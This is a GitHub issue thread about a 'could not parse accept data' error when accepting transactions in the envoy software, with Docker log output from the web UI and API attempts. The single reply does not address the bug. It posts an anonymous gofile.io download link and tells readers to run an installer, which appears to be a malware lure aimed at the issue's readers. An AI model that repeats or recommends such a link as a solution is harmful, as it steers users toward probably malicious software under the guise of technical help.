### ISSUE TITLE
Transaction acceptance error (Could not parse accept data)

### ISSUE THREAD

**Issue by olegyakovlev** [trisacrypto/envoy#220]
This error occurs when I tried to accept incoming transaction in Web UI and I got "**Could not parse accept data**" error.

In Docker console I got the following error message:
`testnet.local-1  | 12:44PM WRN web POST /v1/transactions/06550ba2-7e5e-4108-aece-a4e4783f4ff1/accept [400] 2 errors occurred client_ip= 5.61.72.221 errors=["could not parse LegalPersonNameTypeCode from value","could not parse LegalPersonNameTypeCode from value"] method=POST path=/v1/transactions/06550ba2-7e5e-4108-aece-a4e4783f4ff1/accept request_id=01J6YH0TCWH1XA2PGZC05X1PVZ resp_bytes=55 resp_time=0.45676 ser_name=web severity=WARNING status=400 version=0.24.1-beta.29`

When I tried to accept this transaction via API call I got almost the same error:
`Request failed (http status 400): {"success":false,"error":"could not parse accept data"}`

In Docker console I got the following error message:
`testnet.local-1  | 12:56PM WRN web POST /v1/transactions/06550ba2-7e5e-4108-aece-a4e4783f4ff1/accept [400] 2 errors occurred client_ip=5.61.72.221 errors=["json: cannot unmarshal array into Go value of type api.Envelope","json: cannot unmarshal array into Go value of type api.Envelope"] method=POST path=/v1/transactions/06550ba2-7e5e-4108-aece-a4e4783f4ff1/accept request_id=01J6YHQ9JR66G83JTV3XAWAPY7 resp_bytes=55 resp_time=0.360173 ser_name=web severity=WARNING status=400 version=0.24.1-beta.29`

**Comment by DeadBoySmile** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
